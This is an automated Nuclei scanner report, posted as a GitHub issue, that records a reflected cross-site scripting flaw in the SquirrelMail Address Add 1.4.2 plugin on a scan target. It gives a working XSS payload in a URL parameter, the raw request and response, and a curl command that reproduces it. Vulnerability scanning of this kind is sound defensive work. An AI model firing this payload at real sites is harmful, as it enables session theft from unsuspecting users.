mkrs2404 / tickets

SquirrelMail Address Add 1.4.2 - Cross-Site Scripting (squirrelmail-address-xss) found on honey.scanme.sh #11

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: squirrelmail-address-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:05 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/4b0e0520b8a222cec29b3c746a2cbf30

Template Information

| Key | Value |
| --- | --- |
| Name | SquirrelMail Address Add 1.4.2 - Cross-Site Scripting |
| Authors | dhiyaneshdk |
| Tags | edb, xss, squirrelmail, plugin |
| Severity | medium |
| Description | SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. |
| CVSS-Metrics | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-80 |
| CVSS-Score | 5.40 |

Request

GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 351
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:05 GMT

GET /plugins/address_add/add.php?first=HOVER ME!</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49' 'https://honey.scanme.sh/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5